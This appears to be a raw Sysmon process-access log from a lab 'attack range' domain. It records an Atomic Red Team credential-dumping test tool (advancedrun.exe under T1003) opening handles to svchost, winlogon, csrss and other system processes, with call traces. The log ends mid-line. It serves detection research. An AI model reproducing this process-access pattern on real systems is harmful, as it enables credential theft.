17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003943832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943830Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943825Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedru